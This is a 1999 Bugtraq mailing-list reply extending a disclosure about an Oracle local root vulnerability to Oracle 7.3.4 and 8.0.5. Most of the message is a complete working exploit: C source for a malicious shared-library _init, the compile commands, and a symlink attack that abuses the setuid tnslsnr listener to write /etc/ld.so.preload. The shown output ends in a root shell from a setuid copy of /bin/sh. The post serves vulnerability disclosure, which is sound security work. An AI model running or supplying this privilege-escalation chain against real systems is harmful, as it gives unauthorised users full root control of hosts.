[12594] in bugtraq
Re: Oracle 8 root exploit
daemon@ATHENA.MIT.EDU (Martin Mevald)
Mon Nov 15 13:35:29 1999
X-Envelope-To: <BUGTRAQ@SECURITYFOCUS.COM>
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.4.20.9911151248050.2500-100000@localhost.localdomain>
Date: Mon, 15 Nov 1999 16:51:54 +0100
Reply-To: Martin Mevald <martinmv@HORNET.CZ>
From: Martin Mevald <martinmv@HORNET.CZ>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Greetings,
Oracle 7.3.4 is vulnerable too.
$ uname -a
SunOS sun450 5.6 Generic_105181-12 sun4u sparc SUNW,Ultra-4
---
Linux: Oracle version: 8.0.5
There isn't dbsnmp with suid bit on Linux. There is tnslsnr.
Program dump file listener.log:
open("listener.log", O_WRONLY|O_APPEND|O_CREAT, 0666)
Exploit:
oracle-ex.c
--------------------------
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init()
{
if (!geteuid()) {
remove("/etc/ld.so.preload");
execl("/bin/bash","bash","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
}
}
---------------------------
$ gcc -o oracle-ex.o -c oracle-ex.c -fPIC
$ gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 oracle-ex.o -nostartfiles
$ unset ORACLE_HOME
$ umask 0000
$ ln -s /etc/ld.so.preload /tmp/listener.log
$ /u01/app/oracle/product/8.0.5/bin/tnslsnr
$ echo /tmp/libno_ex.so.1.0 >/etc/ld.so.preload
$ telnet localhost
Trying ...
Connected to localhost.localdomain.
Escape character is '^]'.
Connection closed by foreign host.
$ ./xxxx
#
Martin Mevald, martinmv@hornet.cz
On Sat, 13 Nov 1999, Tellier, Brock wrote:
> Greetings,
>
> OVERVIEW
> A vulnerability exists in Oracle 8.1.5 for UN*X which may allow any user
> to obtain root privileges.
>